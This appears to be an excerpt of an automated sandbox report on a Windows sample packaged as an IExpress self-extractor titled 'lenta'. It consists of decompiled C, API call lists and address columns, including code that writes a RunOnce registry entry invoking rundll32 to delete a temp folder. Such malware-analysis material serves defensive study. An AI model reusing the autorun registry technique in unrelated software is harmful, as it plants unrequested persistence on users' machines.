                                                                                                                                                                                                                                            0x00a945cd
                                                                                                                                                                                                                                            0x00a945cd
                                                                                                                                                                                                                                            0x00a945cf
                                                                                                                                                                                                                                            0x00a945cf
                                                                                                                                                                                                                                            0x00a945d2
                                                                                                                                                                                                                                            0x00a945d2
                                                                                                                                                                                                                                            0x00a945d4
                                                                                                                                                                                                                                            0x00a945d5
                                                                                                                                                                                                                                            0x00a945db
                                                                                                                                                                                                                                            0x00a945de
                                                                                                                                                                                                                                            0x00a945e3
                                                                                                                                                                                                                                            0x00a945e9
                                                                                                                                                                                                                                            0x00a945ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a945f3
                                                                                                                                                                                                                                            0x00a945fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94602
                                                                                                                                                                                                                                            0x00a945ed
                                                                                                                                                                                                                                            0x00a9457e
                                                                                                                                                                                                                                            0x00a9457e
                                                                                                                                                                                                                                            0x00a94580
                                                                                                                                                                                                                                            0x00a94580
                                                                                                                                                                                                                                            0x00a94583
                                                                                                                                                                                                                                            0x00a94583
                                                                                                                                                                                                                                            0x00a94585
                                                                                                                                                                                                                                            0x00a94586
                                                                                                                                                                                                                                            0x00a9458a
                                                                                                                                                                                                                                            0x00a9458c
                                                                                                                                                                                                                                            0x00a9458f
                                                                                                                                                                                                                                            0x00a9458f
                                                                                                                                                                                                                                            0x00a94591
                                                                                                                                                                                                                                            0x00a94592
                                                                                                                                                                                                                                            0x00a9459b
                                                                                                                                                                                                                                            0x00a9459e
                                                                                                                                                                                                                                            0x00a945a3
                                                                                                                                                                                                                                            0x00a945a9
                                                                                                                                                                                                                                            0x00a945ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a945af
                                                                                                                                                                                                                                            0x00a945af
                                                                                                                                                                                                                                            0x00a945bf
                                                                                                                                                                                                                                            0x00a9462d
                                                                                                                                                                                                                                            0x00a94630
                                                                                                                                                                                                                                            0x00a9463d
                                                                                                                                                                                                                                            0x00a9464e
                                                                                                                                                                                                                                            0x00a9464e
                                                                                                                                                                                                                                            0x00a9463f
                                                                                                                                                                                                                                            0x00a94640
                                                                                                                                                                                                                                            0x00a94647
                                                                                                                                                                                                                                            0x00a9464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9464c
                                                                                                                                                                                                                                            0x00a94666
                                                                                                                                                                                                                                            0x00a9466d
                                                                                                                                                                                                                                            0x00a9466f
                                                                                                                                                                                                                                            0x00a94675
                                                                                                                                                                                                                                            0x00a94675
                                                                                                                                                                                                                                            0x00a945ad
                                                                                                                                                                                                                                            0x00a94527
                                                                                                                                                                                                                                            0x00a9452e
                                                                                                                                                                                                                                            0x00a9453f
                                                                                                                                                                                                                                            0x00a9453f
                                                                                                                                                                                                                                            0x00a94530
                                                                                                                                                                                                                                            0x00a94531
                                                                                                                                                                                                                                            0x00a94538
                                                                                                                                                                                                                                            0x00a9453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9453d
                                                                                                                                                                                                                                            0x00a94554
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a9455a
                                                                                                                                                                                                                                            0x00a94525
                                                                                                                                                                                                                                            0x00a9468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A9460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A94630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A94666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A9466F
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                                                              • Part of subcall function 00A9681F: RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                                                            • Instruction ID: c27248ad4f88c2f1bd6b22dc164baba6ac3f33d16f40067c2cc6b4cb95037dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151B276B00215ABDF219FA88D48BAA7BF9EF4A300F154196F949A7241DB319D06CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A92773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A91781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A9658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A9658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa91140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A91680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00a92773
                                                                                                                                                                                                                                            0x00a9277e
                                                                                                                                                                                                                                            0x00a92785
                                                                                                                                                                                                                                            0x00a9278a
                                                                                                                                                                                                                                            0x00a9278d
                                                                                                                                                                                                                                            0x00a92790
                                                                                                                                                                                                                                            0x00a92792
                                                                                                                                                                                                                                            0x00a92798
                                                                                                                                                                                                                                            0x00a9279d
                                                                                                                                                                                                                                            0x00a928b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a927a3
                                                                                                                                                                                                                                            0x00a927a3
                                                                                                                                                                                                                                            0x00a927af
                                                                                                                                                                                                                                            0x00a927c2
                                                                                                                                                                                                                                            0x00a927c8
                                                                                                                                                                                                                                            0x00a927cd
                                                                                                                                                                                                                                            0x00a927d5
                                                                                                                                                                                                                                            0x00a928b7
                                                                                                                                                                                                                                            0x00a928b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a927db
                                                                                                                                                                                                                                            0x00a927dd
                                                                                                                                                                                                                                            0x00a928aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a927e3
                                                                                                                                                                                                                                            0x00a927e3
                                                                                                                                                                                                                                            0x00a927ec
                                                                                                                                                                                                                                            0x00a927f8
                                                                                                                                                                                                                                            0x00a92803
                                                                                                                                                                                                                                            0x00a9280b
                                                                                                                                                                                                                                            0x00a92831
                                                                                                                                                                                                                                            0x00a928c3
                                                                                                                                                                                                                                            0x00a928c9
                                                                                                                                                                                                                                            0x00a928cd
                                                                                                                                                                                                                                            0x00a92837
                                                                                                                                                                                                                                            0x00a9285a
                                                                                                                                                                                                                                            0x00a9285c
                                                                                                                                                                                                                                            0x00a92865
                                                                                                                                                                                                                                            0x00a92892
                                                                                                                                                                                                                                            0x00a92895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92867
                                                                                                                                                                                                                                            0x00a92878
                                                                                                                                                                                                                                            0x00a9288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9287a
                                                                                                                                                                                                                                            0x00a92880
                                                                                                                                                                                                                                            0x00a92885
                                                                                                                                                                                                                                            0x00a92897
                                                                                                                                                                                                                                            0x00a92899
                                                                                                                                                                                                                                            0x00a92899
                                                                                                                                                                                                                                            0x00a92878
                                                                                                                                                                                                                                            0x00a92865
                                                                                                                                                                                                                                            0x00a928a0
                                                                                                                                                                                                                                            0x00a928bf
                                                                                                                                                                                                                                            0x00a928c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a928c1
                                                                                                                                                                                                                                            0x00a92831
                                                                                                                                                                                                                                            0x00a927dd
                                                                                                                                                                                                                                            0x00a927d5
                                                                                                                                                                                                                                            0x00a928e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(306EBEDF,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A928AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A928B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A927E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                                                            • Instruction ID: 0d23a77eda34f2c0fe8087a8abffe9b9315949efda8f11b62a32a3f63311a099
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24416071B00128ABDF24DB649C85BFA77FDEF65700F1480AAF549D2110DB708E868FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A92267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa98530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A9658A( &_v268, 0x104, 0xa91140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            							E00A9171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a92272
                                                                                                                                                                                                                                            0x00a92277
                                                                                                                                                                                                                                            0x00a92279
                                                                                                                                                                                                                                            0x00a92283
                                                                                                                                                                                                                                            0x00a92289
                                                                                                                                                                                                                                            0x00a922ab
                                                                                                                                                                                                                                            0x00a922b1
                                                                                                                                                                                                                                            0x00a922c4
                                                                                                                                                                                                                                            0x00a922e0
                                                                                                                                                                                                                                            0x00a922e6
                                                                                                                                                                                                                                            0x00a922f5
                                                                                                                                                                                                                                            0x00a9230d
                                                                                                                                                                                                                                            0x00a9231c
                                                                                                                                                                                                                                            0x00a9231c
                                                                                                                                                                                                                                            0x00a92321
                                                                                                                                                                                                                                            0x00a9233a
                                                                                                                                                                                                                                            0x00a92342
                                                                                                                                                                                                                                            0x00a92348
                                                                                                                                                                                                                                            0x00a9234b
                                                                                                                                                                                                                                            0x00a9234c
                                                                                                                                                                                                                                            0x00a9234c
                                                                                                                                                                                                                                            0x00a9234e
                                                                                                                                                                                                                                            0x00a9234f
                                                                                                                                                                                                                                            0x00a9236e
                                                                                                                                                                                                                                            0x00a9236e
                                                                                                                                                                                                                                            0x00a9237a
                                                                                                                                                                                                                                            0x00a92380
                                                                                                                                                                                                                                            0x00a92380
                                                                                                                                                                                                                                            0x00a92381
                                                                                                                                                                                                                                            0x00a92381
                                                                                                                                                                                                                                            0x00a9238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A922A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00A922D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A922F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A9236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A9237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A9232D
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A92299
                                                                                                                                                                                                                                            • wextract_cleanup2, xrefs: 00A9227C, 00A922CD, 00A92363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A92321
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 3027380567-1720115735
                                                                                                                                                                                                                                            • Opcode ID: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                                                            • Instruction ID: 7f2562d8f57296b15651d63e88d2ab7e6d1ea9574cf4e17745e8897ec9a426d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1319371B00218BBDF21DB65DC49FEB77BCEB15700F0001AAB50DAA050EE746B89CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A93100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa98590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa98590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A943D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa98d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A930C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a93108
                                                                                                                                                                                                                                            0x00a9310b
                                                                                                                                                                                                                                            0x00a931b7
                                                                                                                                                                                                                                            0x00a931ca
                                                                                                                                                                                                                                            0x00a931d0
                                                                                                                                                                                                                                            0x00a931d0
                                                                                                                                                                                                                                            0x00a931da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a931da
                                                                                                                                                                                                                                            0x00a93111
                                                                                                                                                                                                                                            0x00a93114
                                                                                                                                                                                                                                            0x00a93136
                                                                                                                                                                                                                                            0x00a93136
                                                                                                                                                                                                                                            0x00a93138
                                                                                                                                                                                                                                            0x00a9313b
                                                                                                                                                                                                                                            0x00a93141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93143
                                                                                                                                                                                                                                            0x00a93116
                                                                                                                                                                                                                                            0x00a9311b
                                                                                                                                                                                                                                            0x00a9314b
                                                                                                                                                                                                                                            0x00a93151
                                                                                                                                                                                                                                            0x00a93158
                                                                                                                                                                                                                                            0x00a9316a
                                                                                                                                                                                                                                            0x00a93176
                                                                                                                                                                                                                                            0x00a9317d
                                                                                                                                                                                                                                            0x00a9318b
                                                                                                                                                                                                                                            0x00a9319e
                                                                                                                                                                                                                                            0x00a931a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a931ad
                                                                                                                                                                                                                                            0x00a93120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
